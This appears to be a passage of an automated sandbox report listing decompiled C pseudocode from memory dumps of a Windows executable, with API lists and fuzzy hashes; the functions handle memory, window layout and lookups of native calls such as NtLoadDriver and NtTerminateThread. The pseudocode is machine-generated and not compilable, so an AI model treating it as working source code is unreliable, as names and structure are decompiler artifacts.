                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                          			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                          				void _v56;
                                                                                                                                                                                                                          				char _v584;
                                                                                                                                                                                                                          				char _v588;
                                                                                                                                                                                                                          				char _v41548;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                          				void _t46;
                                                                                                                                                                                                                          				intOrPtr _t47;
                                                                                                                                                                                                                          				intOrPtr* _t64;
                                                                                                                                                                                                                          				intOrPtr* _t66;
                                                                                                                                                                                                                          				intOrPtr _t67;
                                                                                                                                                                                                                          				intOrPtr _t71;
                                                                                                                                                                                                                          				int _t77;
                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                                          				void* _t82;
                                                                                                                                                                                                                          				void* _t83;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0xa248, __ecx);
                                                                                                                                                                                                                          				_t77 = 0;
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				E00408E31();
                                                                                                                                                                                                                          				_t40 =  *0x41c47c;
                                                                                                                                                                                                                          				if(_t40 != 0) {
                                                                                                                                                                                                                          					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(_v8 == _t77) {
                                                                                                                                                                                                                          					_v8 = 0x186a0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v8 = _v8 + 0x3e80;
                                                                                                                                                                                                                          				_push(_v8);
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				_t81 = _t40;
                                                                                                                                                                                                                          				_v20 = _t81;
                                                                                                                                                                                                                          				memset(_t81, _t77, _v8);
                                                                                                                                                                                                                          				_t83 = _t82 + 0x10;
                                                                                                                                                                                                                          				_v24 = _t77;
                                                                                                                                                                                                                          				E00408E31();
                                                                                                                                                                                                                          				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
                                                                                                                                                                                                                          				L5:
                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
                                                                                                                                                                                                                          						L16:
                                                                                                                                                                                                                          						_t46 =  *_t81;
                                                                                                                                                                                                                          						_t77 = 0;
                                                                                                                                                                                                                          						if(_t46 == 0) {
                                                                                                                                                                                                                          							_push(_v20);
                                                                                                                                                                                                                          							L0040B272();
                                                                                                                                                                                                                          							return _t46;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t81 = _t81 + _t46;
                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t47 = _a4;
                                                                                                                                                                                                                          					_t71 =  *((intOrPtr*)(_t47 + 0x34));
                                                                                                                                                                                                                          					_v12 = _t77;
                                                                                                                                                                                                                          					_v16 = _t71;
                                                                                                                                                                                                                          					if(_t71 <= _t77) {
                                                                                                                                                                                                                          						L10:
                                                                                                                                                                                                                          						_t66 = 0;
                                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                                          						if(_t66 == 0) {
                                                                                                                                                                                                                          							E004090AF( &_v588);
                                                                                                                                                                                                                          							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                                                                                                                                                          							_t32 = _t81 + 0x20; // 0x20
                                                                                                                                                                                                                          							memcpy( &_v56, _t32, 8);
                                                                                                                                                                                                                          							_t83 = _t83 + 0x10;
                                                                                                                                                                                                                          							E004099ED(_a4 + 0x28,  &_v588);
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t26 = _t66 + 4; // 0x4
                                                                                                                                                                                                                          							_t72 = _t26;
                                                                                                                                                                                                                          							if( *_t26 == 0) {
                                                                                                                                                                                                                          								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                                                                                                                                                          								_t28 = _t81 + 0x20; // 0x20
                                                                                                                                                                                                                          								memcpy(_t66 + 0x214, _t28, 8);
                                                                                                                                                                                                                          								_t83 = _t83 + 0x10;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t67 =  *((intOrPtr*)(_t81 + 0x44));
                                                                                                                                                                                                                          					_t80 = _t47 + 0x28;
                                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                                          						_t64 = E00405A92(_v12, _t80);
                                                                                                                                                                                                                          						if( *_t64 == _t67) {
                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                          						if(_v12 < _v16) {
                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L10;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t66 = _t64;
                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}


                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409805
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040988A
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004098C0
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3641025914-0
                                                                                                                                                                                                                          • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                                                                                                                          • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                          			E004067AC(char** __edi) {
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t9;
                                                                                                                                                                                                                          				void** _t11;
                                                                                                                                                                                                                          				char** _t15;
                                                                                                                                                                                                                          				char** _t24;
                                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                                          				char* _t28;
                                                                                                                                                                                                                          				char* _t29;
                                                                                                                                                                                                                          				char* _t30;
                                                                                                                                                                                                                          				char* _t31;
                                                                                                                                                                                                                          				char** _t33;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t24 = __edi;
                                                                                                                                                                                                                          				 *__edi = "cf@";
                                                                                                                                                                                                                          				_t9 = E00406746(__edi);
                                                                                                                                                                                                                          				_t28 = __edi[5];
                                                                                                                                                                                                                          				if(_t28 != 0) {
                                                                                                                                                                                                                          					_t9 = E004055D1(_t9, _t28);
                                                                                                                                                                                                                          					_push(_t28);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t29 = _t24[4];
                                                                                                                                                                                                                          				if(_t29 != 0) {
                                                                                                                                                                                                                          					_t9 = E004055D1(_t9, _t29);
                                                                                                                                                                                                                          					_push(_t29);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t30 = _t24[3];
                                                                                                                                                                                                                          				if(_t30 != 0) {
                                                                                                                                                                                                                          					_t9 = E004055D1(_t9, _t30);
                                                                                                                                                                                                                          					_push(_t30);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t31 = _t24[2];
                                                                                                                                                                                                                          				if(_t31 != 0) {
                                                                                                                                                                                                                          					E004055D1(_t9, _t31);
                                                                                                                                                                                                                          					_push(_t31);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t15 = _t24;
                                                                                                                                                                                                                          				_pop(_t32);
                                                                                                                                                                                                                          				_push(_t24);
                                                                                                                                                                                                                          				_t33 = _t15;
                                                                                                                                                                                                                          				_t25 = 0;
                                                                                                                                                                                                                          				if(_t33[1] > 0 && _t33[0xd] > 0) {
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
                                                                                                                                                                                                                          						_t25 = _t25 + 1;
                                                                                                                                                                                                                          					} while (_t25 < _t33[0xd]);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t11 =  *( *_t33)();
                                                                                                                                                                                                                          				free( *_t11);
                                                                                                                                                                                                                          				return _t11;
                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                                                                                                                                          • free.MSVCRT(00000000), ref: 00406839
                                                                                                                                                                                                                            • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2241099983-0
                                                                                                                                                                                                                          • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                                                                                                                          • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                          				struct tagPOINT _v20;
                                                                                                                                                                                                                          				struct tagRECT _v36;
                                                                                                                                                                                                                          				int _t27;
                                                                                                                                                                                                                          				struct HWND__* _t30;
                                                                                                                                                                                                                          				struct HWND__* _t32;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t30 = _a4;
                                                                                                                                                                                                                          				if((_a8 & 0x00000001) != 0) {
                                                                                                                                                                                                                          					_t32 = GetParent(_t30);
                                                                                                                                                                                                                          					GetWindowRect(_t30,  &_v20);
                                                                                                                                                                                                                          					GetClientRect(_t32,  &_v36);
                                                                                                                                                                                                                          					MapWindowPoints(0, _t32,  &_v20, 2);
                                                                                                                                                                                                                          					_t27 = _v36.right - _v12 - _v36.left;
                                                                                                                                                                                                                          					_v20.x = _t27;
                                                                                                                                                                                                                          					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if((_a8 & 0x00000002) != 0) {
                                                                                                                                                                                                                          					E00404FBB(_t30);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00405D0A
                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00405D17
                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 00405D22
                                                                                                                                                                                                                          • MapWindowPoints.USER32 ref: 00405D32
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                                                          • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                                                                                                                          • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                          			E004083DC(void* __eax, int __ebx, void* _a4) {
                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                                          				void* _t32;
                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t20 = __eax;
                                                                                                                                                                                                                          				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                                                          				_t28 = __eax - 1;
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				_v16 = __eax;
                                                                                                                                                                                                                          				if(_t28 > 0) {
                                                                                                                                                                                                                          					_t21 = _a4;
                                                                                                                                                                                                                          					_v8 = __ebx;
                                                                                                                                                                                                                          					_v8 =  ~_v8;
                                                                                                                                                                                                                          					_t32 = _t28 * __ebx + _t21;
                                                                                                                                                                                                                          					_a4 = _t21;
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						memcpy(_v16, _a4, __ebx);
                                                                                                                                                                                                                          						memcpy(_a4, _t32, __ebx);
                                                                                                                                                                                                                          						_t20 = memcpy(_t32, _v16, __ebx);
                                                                                                                                                                                                                          						_a4 = _a4 + __ebx;
                                                                                                                                                                                                                          						_t32 = _t32 + _v8;
                                                                                                                                                                                                                          						_t34 = _t34 + 0x24;
                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                          						_t28 = _t28 - 1;
                                                                                                                                                                                                                          					} while (_t28 > _v12);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_push(_v16);
                                                                                                                                                                                                                          				L0040B272();
                                                                                                                                                                                                                          				return _t20;
                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                          0x00408442
                                                                                                                                                                                                                          0x0040844a

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$??2@??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1252195045-0
                                                                                                                                                                                                                          • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                                                                                                                          • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                                                          			E00406746(void* __esi) {
                                                                                                                                                                                                                          				intOrPtr _t9;
                                                                                                                                                                                                                          				intOrPtr _t10;
                                                                                                                                                                                                                          				intOrPtr _t11;
                                                                                                                                                                                                                          				intOrPtr* _t18;
                                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t19 = __esi;
                                                                                                                                                                                                                          				_t9 =  *((intOrPtr*)(__esi + 0x30));
                                                                                                                                                                                                                          				if(_t9 != 0) {
                                                                                                                                                                                                                          					_push(_t9);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t10 =  *((intOrPtr*)(_t19 + 0x40));
                                                                                                                                                                                                                          				if(_t10 != 0) {
                                                                                                                                                                                                                          					_push(_t10);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
                                                                                                                                                                                                                          				if(_t11 != 0) {
                                                                                                                                                                                                                          					_push(_t11);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
                                                                                                                                                                                                                          				if(_t18 != 0) {
                                                                                                                                                                                                                          					_t11 =  *_t18;
                                                                                                                                                                                                                          					if(_t11 != 0) {
                                                                                                                                                                                                                          						_push(_t11);
                                                                                                                                                                                                                          						L0040B272();
                                                                                                                                                                                                                          						 *_t18 = 0;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_push(_t18);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t19 + 0x30)) = 0;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t19 + 0x40)) = 0;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
                                                                                                                                                                                                                          				return _t11;
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                                                                                                                          • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                          			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                          				struct HDWP__* _v8;
                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                          				intOrPtr _t37;
                                                                                                                                                                                                                          				intOrPtr _t42;
                                                                                                                                                                                                                          				RECT* _t44;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                          				_t42 = __ecx;
                                                                                                                                                                                                                          				_v12 = __ecx;
                                                                                                                                                                                                                          				if(_a4 != 5) {
                                                                                                                                                                                                                          					if(_a4 != 0xf) {
                                                                                                                                                                                                                          						if(_a4 == 0x24) {
                                                                                                                                                                                                                          							_t37 = _a12;
                                                                                                                                                                                                                          							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
                                                                                                                                                                                                                          							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						E00402EC8(__ecx + 0x378);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_v8 = BeginDeferWindowPos(3);
                                                                                                                                                                                                                          					_t44 = _t42 + 0x378;
                                                                                                                                                                                                                          					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
                                                                                                                                                                                                                          					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
                                                                                                                                                                                                                          					EndDeferWindowPos(_v8);
                                                                                                                                                                                                                          					InvalidateRect( *(_t44 + 0x10), _t44, 1);
                                                                                                                                                                                                                          					_t42 = _v12;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return E00402CED(_t42, _a4, _a8, _a12);
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                                                                                                                                            • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                                                                                                                            • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                                                                                                                            • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                          • API String ID: 2498372239-3993045852
                                                                                                                                                                                                                          • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                                                                                                                          • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                                                                                          				int _t14;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if(_a8 == 0x100 && _a12 == 0x41) {
                                                                                                                                                                                                                          					GetKeyState(0xa2);
                                                                                                                                                                                                                          					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
                                                                                                                                                                                                                          						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
                                                                                                                                                                                                                          							_t14 = E00403A60(0xa5);
                                                                                                                                                                                                                          							if(_t14 == 0) {
                                                                                                                                                                                                                          								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
